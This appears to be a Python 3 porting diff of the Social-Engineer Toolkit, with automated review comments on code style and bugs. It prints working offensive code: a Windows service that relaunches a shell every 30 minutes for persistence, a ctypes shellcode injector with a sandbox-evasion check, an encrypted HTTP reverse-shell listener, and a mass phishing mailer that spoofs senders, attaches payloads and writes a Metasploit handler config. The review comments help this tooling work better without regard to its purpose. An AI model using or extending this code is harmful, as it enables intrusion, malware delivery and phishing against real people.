if windows_version < 3791:
fileopen=file("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to AppData instead
fileopen = open("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to
# AppData instead
if windows_version > 3791:
fileopen=file("%s\\isjxwqjs" % (homedir_path), "r")
fileopen = open("%s\\isjxwqjs" % (homedir_path), "r")
for line in fileopen:
# pull set-path, this is pulled from interactive shell and written when persistence is called
set_path=line.rstrip()
# pull set-path, this is pulled from interactive shell and
# written when persistence is called
set_path = line.rstrip()
# specify filename to execute the SET interactive shell
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# sleep 30 mins
time.sleep(1800)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
@ -85,7 +89,7 @@ if __name__ == '__main__':
servicemanager.PrepareToHostSingle(aservice)
servicemanager.Initialize('aservice', evtsrc_dll)
servicemanager.StartServiceCtrlDispatcher()
except win32service.error, details:
except win32service.error as details:
if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT:
win32serviceutil.usage()
else:
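Review bot: `rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)` in SvcDoRun is assigned and never inspected, and the unconditional `time.sleep(1800)` at the end of the same `while self.isAlive` loop means a stop request raised by SvcStop is only noticed up to 30 minutes later, even though the wait was given a one-second timeout. Check the result, `if rc == win32event.WAIT_OBJECT_0: break`, and replace the sleep with a second `win32event.WaitForSingleObject(self.hWaitStop, 1800000)` whose result is checked the same way, so the service responds to the SCM promptly. A smaller point: the handle opened by `fileopen = open("%s\\system32\\isjxwqjs" % (windir), "r")` (and its AppData counterpart) is never closed and a new one is opened on every iteration; `with open(...) as fileopen:` around the `for line in fileopen:` loop releases it. The loop header lives in the previous hunk of this section, so the control flow is split across hunks here.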

111
src/payloads/set_payloads/pyinjector_args.py Executable file → Normal file

@ -1,55 +1,56 @@
#!/usr/bin/python
import ctypes
import sys
import multiprocessing
# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
# Injects shellcode into memory through Python and ctypes
#
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# see if we specified shellcode
try:
sc = sys.argv[1]
# if we didn't specify a param
except IndexError:
sys.exit()
# need to code the input into the right format through string escape
sc = sc.decode("string_escape")
# convert to bytearray
sc = bytearray(sc)
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual address space
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
# read in the buffer
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
# moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
#!/usr/bin/python
import ctypes
import sys
import multiprocessing
# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
# Injects shellcode into memory through Python and ctypes
#
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# see if we specified shellcode
try:
sc = sys.argv[1]
# if we didn't specify a param
except IndexError:
sys.exit()
# need to code the input into the right format through string escape
sc = sc.decode("string_escape")
# convert to bytearray
sc = bytearray(sc)
# use types windll.kernel32 for virtualalloc reserves region of pages in
# virtual address space
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
# read in the buffer
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
# moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
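Review bot: `sc = sc.decode("string_escape")` is left unported on the new side: under Python 3 `sys.argv[1]` is a `str`, which has no `decode` method, and `string_escape` is not a Python 3 codec, so the script stops with AttributeError at that line. The commit only rewraps the VirtualAlloc comment and adds a space after a comma in this file, so it now reads as part of a Python 3 port while still being Python 2 only; at minimum mark the line `# TODO: Python 2 only -- str has no decode() on Python 3` so nobody treats the file as ported. Style: `exit()` in the `cpu_count()` check is the `site` builtin while the IndexError branch uses `sys.exit()`; use `sys.exit()` in both places. The old copy of the file is printed above the new one in this section.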

39
src/payloads/set_payloads/set_http_server.py Executable file → Normal file

@ -9,9 +9,9 @@
#
#
############################################
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
import urlparse
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
import urllib.parse
import re
import os
import base64
@ -41,13 +41,18 @@ secret = "(3j^%sh@hd3hDH2u3h@*!~h~2&^lk<!L"
cipher = AES.new(secret)
# url decode for postbacks
def htc(m):
return chr(int(m.group(1),16))
return chr(int(m.group(1), 16))
# url decode
def urldecode(url):
rex=re.compile('%([0-9a-hA-H][0-9a-hA-H])',re.M)
return rex.sub(htc,url)
rex = re.compile('%([0-9a-hA-H][0-9a-hA-H])', re.M)
return rex.sub(htc, url)
class GetHandler(BaseHTTPRequestHandler):
@ -55,7 +60,7 @@ class GetHandler(BaseHTTPRequestHandler):
def do_GET(self):
# this will be our shell command
message = raw_input("shell> ")
message = input("shell> ")
# if we specify quit, then sys arg out of the shell
if message == "quit" or message == "exit":
print ("\nExiting the SET RevShell Listener... ")
@ -86,17 +91,17 @@ class GetHandler(BaseHTTPRequestHandler):
# read in the length of the POST data
qs = self.rfile.read(length)
# url decode
url=urldecode(qs)
url = urldecode(qs)
# remove the parameter cmd
url=url.replace("cmd=", "")
url = url.replace("cmd=", "")
# base64 decode
message = base64.b64decode(url)
# decrypt the string
message = DecodeAES(cipher, message)
# display the command back decrypted
print message
print(message)
#if __name__ == '__main__':
# if __name__ == '__main__':
try:
# bind to all interfaces
if check_options("PORT=") != 0:
@ -106,21 +111,21 @@ try:
port = 443
server = HTTPServer(('', int(port)), GetHandler)
print """############################################
print("""############################################
#
# The Social-Engineer Toolkit (SET) HTTP RevShell
#
# Dave Kennedy (ReL1K)
# https://www.trustedsec.com
#
############################################"""
print 'Starting encrypted web shell server, use <Ctrl-C> to stop'
############################################""")
print('Starting encrypted web shell server, use <Ctrl-C> to stop')
# simple try block
try:
# serve and listen forever
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
print "[!] Exiting the encrypted webserver shell.. hack the gibson."
except Exception, e:
print "Something went wrong, printing error: " + e
print("[!] Exiting the encrypted webserver shell.. hack the gibson.")
except Exception as e:
print("Something went wrong, printing error: " + e)
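Review bot: `print("Something went wrong, printing error: " + e)` in the last hunk concatenates a `str` with an exception object, which raises TypeError and replaces the original error with a new one; use `print("Something went wrong, printing error: " + str(e))`. In the POST handler (its `def` is outside the hunk), `qs = self.rfile.read(length)` returns `bytes` on Python 3 while `urldecode` compiles a `str` pattern, so `rex.sub(htc, url)` is expected to raise TypeError on the first postback unless the body is decoded first, e.g. `url = urldecode(qs.decode())` — inferred from the Python 3 `http.server` API rather than visible here. The `secret` shown in the hunk header context is a fixed literal in the source, so the channel is readable by anyone holding the script; a one-line comment saying so would stop the next maintainer from treating it as confidential.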

539
src/payloads/set_payloads/shell.py Executable file → Normal file



@ -5,23 +5,26 @@ from src.core import setcore as core
try:
print ("\n [****] Custom Template Generator [****]\n")
print ("\n Always looking for new templates! In the set/src/templates directory send an email\nto davek@secmaniac.com if you got a good template!")
author=raw_input(core.setprompt("0", "Name of the author"))
filename=randomgen=random.randrange(1,99999999999999999999)
filename=str(filename)+(".template")
subject=raw_input(core.setprompt("0", "Email Subject"))
author = input(core.setprompt("0", "Name of the author"))
filename = randomgen = random.randrange(1, 99999999999999999999)
filename = str(filename) + (".template")
subject = input(core.setprompt("0", "Email Subject"))
try:
body=raw_input(core.setprompt("0", "Message Body, hit return for a new line. Control+c when you are finished"))
body = input(core.setprompt(
"0", "Message Body, hit return for a new line. Control+c when you are finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=(r"\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
filewrite=file("src/templates/%s" % (filename), "w")
filewrite.write("# Author: "+author+"\n#\n#\n#\n")
filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
filewrite.write('BODY='+'"'+body+'"\n')
print "\n"
body += (r"\n")
body += input("Next line of the body: ")
except KeyboardInterrupt:
break
except KeyboardInterrupt:
pass
filewrite = open("src/templates/%s" % (filename), "w")
filewrite.write("# Author: " + author + "\n#\n#\n#\n")
filewrite.write('SUBJECT=' + '"' + subject + '"\n\n')
filewrite.write('BODY=' + '"' + body + '"\n')
print("\n")
filewrite.close()
except Exception, e:
print " An error occured, printing error message: "+str(e)
except Exception as e:
print(" An error occured, printing error message: " + str(e))
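Review bot: `filewrite = open("src/templates/%s" % (filename), "w")` is only closed on the success path by `filewrite.close()`; if one of the three `filewrite.write(...)` calls raises, the outer `except Exception` reports the error but the handle stays open. `with open("src/templates/%s" % (filename), "w") as filewrite:` with the three writes indented under it covers both paths and drops the explicit close. Separately, a Ctrl+C during the first `input(core.setprompt("0", "Message Body, ..."))` is caught by the outer `except KeyboardInterrupt: pass` before `body` is bound, so the `'BODY='` write fails with NameError that surfaces only as the generic "An error occured" message; initialise `body = ""` before that `try`. The file header of this section is not shown, so the path is unknown from here.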


@ -10,9 +10,9 @@ import glob
import random
import pexpect
import base64
import thread
import _thread
from cStringIO import StringIO
from io import StringIO
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
@ -21,24 +21,25 @@ from email.generator import Generator
from email import Charset
from email import Encoders
# DEFINE SENDMAIL CONFIG
sendmail=0
sendmail_file=file("/etc/setoolkit/set.config","r").readlines()
sendmail = 0
sendmail_file = file("/etc/setoolkit/set.config", "r").readlines()
from src.core.setcore import *
Charset.add_charset('utf-8', Charset.BASE64, Charset.BASE64, 'utf-8')
# Specify if its plain or html
message_flag="plain"
message_flag = "plain"
for line in sendmail_file:
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
line = line.rstrip()
match = re.search("SENDMAIL=", line)
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info(
"Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info("Sendmail can take up to three minutes to start FYI.")
print_status("Sendmail is set to ON")
sendmail_choice = yesno_prompt(["1"], "Start Sendmail? [yes|no]")
@ -46,25 +47,28 @@ for line in sendmail_file:
if sendmail_choice == "YES":
print_info("NOTE: Sendmail can take 3-5 minutes to start.")
if os.path.isfile("/etc/init.d/sendmail"):
subprocess.Popen("/etc/init.d/sendmail start", shell=True).wait()
subprocess.Popen(
"/etc/init.d/sendmail start", shell=True).wait()
# if not there then prompt user
if not os.path.isfile("/etc/init.d/sendmail"):
pause=raw_input("[!] Sendmail was not found. Install it and try again. (For Kali: apt-get install sendmail-bin)")
pause = input(
"[!] Sendmail was not found. Install it and try again. (For Kali: apt-get install sendmail-bin)")
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw user and password to blank, needed for defining below
provideruser=''
pwd=''
sendmail = 1
# just throw user and password to blank, needed for defining
# below
provideruser = ''
pwd = ''
# Search for SMTP provider we will be using
match1=re.search("EMAIL_PROVIDER=", line)
match1 = re.search("EMAIL_PROVIDER=", line)
if match1:
# if we hit on EMAIL PROVIDER
email_provider=line.replace("EMAIL_PROVIDER=", "").lower()
email_provider = line.replace("EMAIL_PROVIDER=", "").lower()
# support smtp for gmail
if email_provider == "gmail":
@ -85,28 +89,38 @@ for line in sendmail_file:
port = ("25")
# DEFINE METASPLOIT PATH
meta_path=meta_path()
meta_path = meta_path()
print_info("As an added bonus, use the file-format creator in SET to create your attachment.")
counter=0
print_info(
"As an added bonus, use the file-format creator in SET to create your attachment.")
counter = 0
# PDF Previous
if os.path.isfile(setdir + "/template.pdf"):
if os.path.isfile(setdir + "/template.rar"):
if os.path.isfile(setdir + "/template.zip"):
print_warning("Multiple payloads were detected:")
print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n")
choose_payload=raw_input(setprompt("0", ""))
if choose_payload=='1': file_format=(setdir + "/template.pdf")
if choose_payload=='2': file_format=(setdir + "/template.rar")
if choose_payload=='3': file_format=(setdir + "/template.zip")
counter=1
if counter==0:
if os.path.isfile(setdir + "/template.pdf"): file_format=(setdir + "/template.pdf")
if os.path.isfile(setdir + "/template.rar"): file_format=(setdir + "/template.rar")
if os.path.isfile(setdir + "/template.zip"): file_format=(setdir + "/template.zip")
if os.path.isfile(setdir + "/template.doc"): file_format=(setdir + "/template.doc")
if os.path.isfile(setdir + "/template.rtf"): file_format=(setdir + "/template.rtf")
if os.path.isfile(setdir + "/template.mov"): file_format=(setdir + "/template.mov")
choose_payload = input(setprompt("0", ""))
if choose_payload == '1':
file_format = (setdir + "/template.pdf")
if choose_payload == '2':
file_format = (setdir + "/template.rar")
if choose_payload == '3':
file_format = (setdir + "/template.zip")
counter = 1
if counter == 0:
if os.path.isfile(setdir + "/template.pdf"):
file_format = (setdir + "/template.pdf")
if os.path.isfile(setdir + "/template.rar"):
file_format = (setdir + "/template.rar")
if os.path.isfile(setdir + "/template.zip"):
file_format = (setdir + "/template.zip")
if os.path.isfile(setdir + "/template.doc"):
file_format = (setdir + "/template.doc")
if os.path.isfile(setdir + "/template.rtf"):
file_format = (setdir + "/template.rtf")
if os.path.isfile(setdir + "/template.mov"):
file_format = (setdir + "/template.mov")
# Determine if prior payload created
if not os.path.isfile(setdir + "/template.pdf"):
@ -115,12 +129,14 @@ if not os.path.isfile(setdir + "/template.pdf"):
if not os.path.isfile(setdir + "/template.doc"):
if not os.path.isfile(setdir + "/template.rtf"):
if not os.path.isfile(setdir + "/template.mov"):
print "No previous payload created."
file_format=raw_input(setprompt(["1"], "Enter the file to use as an attachment"))
print("No previous payload created.")
file_format = input(
setprompt(["1"], "Enter the file to use as an attachment"))
if not os.path.isfile("%s" % (file_format)):
while 1:
print_error("ERROR:FILE NOT FOUND. Try Again.")
file_format=raw_input(setprompt(["1"], "Enter the file to use as an attachment"))
file_format = input(
setprompt(["1"], "Enter the file to use as an attachment"))
if os.path.isfile(file_format):
break
@ -128,7 +144,7 @@ if not os.path.isfile(setdir + "/template.pdf"):
if not os.path.isfile(file_format):
exit_set()
print """
print("""
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
@ -137,14 +153,15 @@ print """
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
"""
filename1=raw_input(setprompt(["1"], ""))
""")
filename1 = input(setprompt(["1"], ""))
if filename1 == '1' or filename1 == '':
print_status("Keeping the filename and moving on.")
if filename1 == '2':
filename1=raw_input(setprompt(["1"], "New filename"))
subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" % (file_format,setdir,filename1), shell=True).wait()
file_format=("%s/%s" % (setdir,filename1))
filename1 = input(setprompt(["1"], "New filename"))
subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" %
(file_format, setdir, filename1), shell=True).wait()
file_format = ("%s/%s" % (setdir, filename1))
print_status("Filename changed, moving on...")
print ("""
@ -162,7 +179,7 @@ print ("""
99. Return to main menu.
""")
option1 = raw_input(setprompt(["1"], ""))
option1 = input(setprompt(["1"], ""))
if option1 == '1' or option1 == '2':
@ -173,79 +190,82 @@ if option1 == '1' or option1 == '2':
1. Pre-Defined Template
2. One-Time Use Email Template
""")
template_choice = raw_input(setprompt(["1"], ""))
template_choice = input(setprompt(["1"], ""))
# if predefined template go here
if template_choice == '1':
# set path for
path = 'src/templates/'
filewrite=file(setdir + "/email.templates", "w")
counter=0
filewrite = file(setdir + "/email.templates", "w")
counter = 0
# Pull all files in the templates directory
for infile in glob.glob(os.path.join(path, '*.template')):
infile=infile.split("/")
infile = infile.split("/")
# grab just the filename
infile=infile[2]
counter=counter+1
infile = infile[2]
counter = counter + 1
# put it in a format we can use later in a file
filewrite.write(infile+" "+str(counter)+"\n")
filewrite.write(infile + " " + str(counter) + "\n")
# close the file
filewrite.close()
# read in formatted filenames
fileread=file(setdir + "/email.templates","r").readlines()
fileread = file(setdir + "/email.templates", "r").readlines()
print_info("Available templates:")
for line in fileread:
line=line.rstrip()
line=line.split(" ")
filename=line[0]
line = line.rstrip()
line = line.split(" ")
filename = line[0]
# read in file
fileread2=file("src/templates/%s" % (filename),"r").readlines()
fileread2 = file("src/templates/%s" % (filename), "r").readlines()
for line2 in fileread2:
match=re.search("SUBJECT=", line2)
match = re.search("SUBJECT=", line2)
if match:
line2=line2.rstrip()
line2=line2.split("=")
line2=line2[1]
line2 = line2.rstrip()
line2 = line2.split("=")
line2 = line2[1]
# strip double quotes
line2=line2.replace('"', "")
line2 = line2.replace('"', "")
# display results back
print line[1]+": "+line2
print(line[1] + ": " + line2)
# allow user to select template
choice=raw_input(setprompt(["1"], ""))
choice = input(setprompt(["1"], ""))
for line in fileread:
# split based off of space
line=line.split(" ")
line = line.split(" ")
# search for the choice
match=re.search(str(choice), line[1])
match = re.search(str(choice), line[1])
if match:
# print line[0]
extract=line[0]
fileopen=file("src/templates/"+str(extract), "r").readlines()
extract = line[0]
fileopen = file("src/templates/" +
str(extract), "r").readlines()
for line2 in fileopen:
match2=re.search("SUBJECT=", line2)
match2 = re.search("SUBJECT=", line2)
if match2:
subject=line2.replace('"', "")
subject=subject.split("=")
subject=subject[1]
match3=re.search("BODY=", line2)
subject = line2.replace('"', "")
subject = subject.split("=")
subject = subject[1]
match3 = re.search("BODY=", line2)
if match3:
body=line2.replace('"', "")
body=body.replace(r'\n', " \n ")
body=body.split("=")
body=body[1]
body = line2.replace('"', "")
body = body.replace(r'\n', " \n ")
body = body.split("=")
body = body[1]
if template_choice == '2' or template_choice == '':
subject=raw_input(setprompt(["1"], "Subject of the email"))
subject = input(setprompt(["1"], "Subject of the email"))
try:
html_flag=raw_input(setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
html_flag = input(
setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
if html_flag == "" or html_flag == "p":
message_flag="plain"
message_flag = "plain"
if html_flag == "h":
message_flag="html"
message_flag = "html"
body = ""
body=raw_input(setprompt(["1"], "Enter the body of the message, hit return for a new line. Control+c when finished"))
body = input(setprompt(
["1"], "Enter the body of the message, hit return for a new line. Control+c when finished"))
while 1:
try:
body+=("\n")
body+=raw_input("Next line of the body: ")
body += ("\n")
body += input("Next line of the body: ")
except KeyboardInterrupt:
break
except KeyboardInterrupt:
@ -253,7 +273,7 @@ if option1 == '1' or option1 == '2':
# single email
if option1 == '1':
to = raw_input(setprompt(["1"], "Send email to"))
to = input(setprompt(["1"], "Send email to"))
# mass emailer
if option1 == '2':
@ -272,34 +292,42 @@ if option1 == '2':
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
filepath = input(
setprompt(["1"], "Path to the file to import into SET"))
# exit mass mailer menu
if option1 == '99':
exit_set()
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
relay = raw_input(setprompt(["1"], ""))
counter=0
print(("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider)))
relay = input(setprompt(["1"], ""))
counter = 0
# Specify SMTP Option Here
if relay == '1':
provideruser = raw_input(setprompt(["1"], ("Your %s email address" % email_provider)))
provideruser = input(
setprompt(["1"], ("Your %s email address" % email_provider)))
from_address = provideruser
from_displayname = raw_input(setprompt(["1"], "The FROM NAME user will see"))
from_displayname = input(
setprompt(["1"], "The FROM NAME user will see"))
pwd = getpass.getpass("Email password: ")
# Specify Open-Relay Option Here
if relay == '2':
from_address = raw_input(setprompt(["1"], "From address (ex: moo@example.com)"))
from_displayname = raw_input(setprompt(["1"], "The FROM NAME user will see"))
if sendmail==0:
from_address = input(
setprompt(["1"], "From address (ex: moo@example.com)"))
from_displayname = input(
setprompt(["1"], "The FROM NAME user will see"))
if sendmail == 0:
# Ask for a username and password if we aren't using sendmail
provideruser = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
provideruser = input(
setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
if sendmail==0:
smtp = raw_input(setprompt(["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = raw_input(setprompt(["1"], "Port number for the SMTP server [25]"))
if sendmail == 0:
smtp = input(setprompt(
["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = input(
setprompt(["1"], "Port number for the SMTP server [25]"))
if port == "":
port = ("25")
@ -313,16 +341,19 @@ else:
prioflag2 = ' High'
# Define mail send here
def mail(to, subject, text, attach, prioflag1, prioflag2):
msg = MIMEMultipart()
msg['From'] = str(Header(from_displayname, 'UTF-8').encode() + ' <' + from_address + '> ')
msg['From'] = str(
Header(from_displayname, 'UTF-8').encode() + ' <' + from_address + '> ')
msg['To'] = to
msg['X-Priority'] = prioflag1
msg['X-MSMail-Priority'] = prioflag2
msg['Subject'] = Header(subject, 'UTF-8').encode()
# specify if its html or plain
# body message here
body_type=MIMEText(text, "%s" % (message_flag), 'UTF-8')
body_type = MIMEText(text, "%s" % (message_flag), 'UTF-8')
msg.attach(body_type)
# define connection mimebase
part = MIMEBase('application', 'octet-stream')
@ -330,13 +361,14 @@ def mail(to, subject, text, attach, prioflag1, prioflag2):
# base 64 encode message mimebase
Encoders.encode_base64(part)
# add headers
part.add_header('Content-Disposition','attachment; filename="%s"' % os.path.basename(attach))
part.add_header('Content-Disposition',
'attachment; filename="%s"' % os.path.basename(attach))
msg.attach(part)
io = StringIO()
msggen = Generator(io, False)
msggen.flatten(msg)
# define connection to smtp server
mailServer = smtplib.SMTP(smtp, int(port))
mailServer.ehlo()
@ -347,7 +379,8 @@ def mail(to, subject, text, attach, prioflag1, prioflag2):
# start TLS needed for gmail and yahoo
try:
mailServer.starttls()
except: pass
except:
pass
mailServer.ehlo()
if counter == 0:
try:
@ -360,46 +393,51 @@ def mail(to, subject, text, attach, prioflag1, prioflag2):
if len(provideruser) > 0:
mailServer.login(provideruser, pwd)
mailServer.sendmail(from_address, to, io.getvalue())
except Exception, e:
except Exception as e:
print_error("Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.")
raw_input("Press {return} to view error message.")
print str(e)
input("Press {return} to view error message.")
print(str(e))
try:
mailServer.docmd("AUTH LOGIN", base64.b64encode(provideruser))
mailServer.docmd(base64.b64encode(pwd), "")
except Exception,e:
print str(e)
except Exception as e:
print(str(e))
try:
mailServer.login(provideremail, pwd)
thread.start_new_thread(mailServer.sendmail(from_address, to, io.getvalue()))
except Exception, e:
_thread.start_new_thread(mailServer.sendmail(
from_address, to, io.getvalue()))
except Exception as e:
return_continue()
if email_provider == "hotmail":
mailServer.login(provideruser, pwd)
thread.start_new_thread(mailServer.sendmail,(from_address, to, io.getvalue()))
_thread.start_new_thread(mailServer.sendmail,
(from_address, to, io.getvalue()))
if sendmail == 1:
thread.start_new_thread(mailServer.sendmail,(from_address, to, io.getvalue()))
_thread.start_new_thread(mailServer.sendmail,
(from_address, to, io.getvalue()))
if option1 == '1':
try:
mail("%s" % (to), subject, body, "%s" % (file_format), prioflag1, prioflag2)
mail("%s" % (to), subject, body, "%s" %
(file_format), prioflag1, prioflag2)
except socket.error:
print_status("Unable to connect to mail server. Try again (Internet issues?)")
print_status(
"Unable to connect to mail server. Try again (Internet issues?)")
if option1 == '2':
counter=0
email_num=0
fileopen=file(filepath, "r").readlines()
counter = 0
email_num = 0
fileopen = file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
mail("%s" % (to),
subject,
body,
"%s" % (file_format), prioflag1, prioflag2)
email_num=email_num+1
print " Sent e-mail number: " + (str(email_num))
subject,
body,
"%s" % (file_format), prioflag1, prioflag2)
email_num = email_num + 1
print(" Sent e-mail number: " + (str(email_num)))
if not os.path.isfile(setdir + "/template.zip"):
print_status("SET has finished delivering the emails")
@ -408,29 +446,34 @@ if not os.path.isfile(setdir + "/template.zip"):
if not os.path.isfile(setdir + "/payload.options"):
if not os.path.isfile(setdir + "/meta_config"):
if not os.path.isfile(setdir + "/unc_config"):
print_error("Sorry, you did not generate your payload through SET, this option is not supported.")
print_error(
"Sorry, you did not generate your payload through SET, this option is not supported.")
if os.path.isfile(setdir + "/unc_config"):
child=pexpect.spawn("%smsfconsole -r %s/unc_config" % (meta_path,setdir))
try: child.interact()
except Exception: child.close()
if os.path.isfile(setdir + "/payload.options"):
fileopen=file(setdir + "/payload.options","r").readlines()
for line in fileopen:
line=line.rstrip()
line=line.split(" ")
# CREATE THE LISTENER HERE
filewrite=file(setdir + "/meta_config", "w")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+line[0]+"\n")
filewrite.write("set LHOST "+line[1]+"\n")
filewrite.write("set LPORT "+line[2]+"\n")
filewrite.write("set ENCODING shikata_ga_nai\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
child=pexpect.spawn("%smsfconsole -r %s/meta_config" % (meta_path,setdir))
child = pexpect.spawn(
"%smsfconsole -r %s/unc_config" % (meta_path, setdir))
try:
child.interact()
except Exception:
child.close()
if os.path.isfile(setdir + "/payload.options"):
fileopen = file(setdir + "/payload.options", "r").readlines()
for line in fileopen:
line = line.rstrip()
line = line.split(" ")
# CREATE THE LISTENER HERE
filewrite = file(setdir + "/meta_config", "w")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + line[0] + "\n")
filewrite.write("set LHOST " + line[1] + "\n")
filewrite.write("set LPORT " + line[2] + "\n")
filewrite.write("set ENCODING shikata_ga_nai\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
child = pexpect.spawn(
"%smsfconsole -r %s/meta_config" % (meta_path, setdir))
try:
child.interact()
except Exception:
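Review bot: the Python 2 `file()` builtin is still used on the new side at `sendmail_file = file("/etc/setoolkit/set.config", "r").readlines()` and in the template and listener hunks (`filewrite = file(setdir + "/email.templates", "w")`, `fileread = file(...)`, `fileread2 = file(...)`, the `fileopen = file(...)` reads of `src/templates/`, `filepath` and `payload.options`, and `filewrite = file(setdir + "/meta_config", "w")`), whereas the next file in this commit converts the same `set.config` read to `open(`; under Python 3 the first of these is a NameError at import time, so replace each with `open(` as the sibling file does. The `from email.MIMEMultipart import MIMEMultipart`, `email.MIMEBase`, `email.MIMEText`, `from email import Charset` and `from email import Encoders` lines are the Python 2 module names; `cStringIO` was converted in the same hunk but these were not, and on Python 3 they live under `email.mime.multipart`, `email.mime.base`, `email.mime.text`, `email.charset` and `email.encoders`. The `subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" % (file_format, setdir, filename1), shell=True)` call builds a shell command from two interactive prompt values; `shutil.copy(file_format, os.path.join(setdir, filename1))` (with `import shutil`) does the same copy without a shell. The section's file header is not shown, so the path is unknown from here.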


@ -3,14 +3,14 @@ import smtplib
import os
import getpass
import sys
import thread
import _thread
import subprocess
import re
import glob
import random
import time
import base64
from cStringIO import StringIO
from io import StringIO
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
@ -23,7 +23,7 @@ Charset.add_charset('utf-8', Charset.BASE64, Charset.BASE64, 'utf-8')
# default the email messages to plain text
# unless otherwise specified
message_flag="plain"
message_flag = "plain"
# impor the core modules
from src.core.setcore import *
@ -34,17 +34,18 @@ track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
definepath = os.getcwd()
# DEFINE SENDMAIL CONFIG and WEB ATTACK
sendmail=0
sendmail = 0
sendmail_file=file("/etc/setoolkit/set.config","r").readlines()
sendmail_file = open("/etc/setoolkit/set.config", "r").readlines()
for line in sendmail_file:
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
line = line.rstrip()
match = re.search("SENDMAIL=", line)
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info(
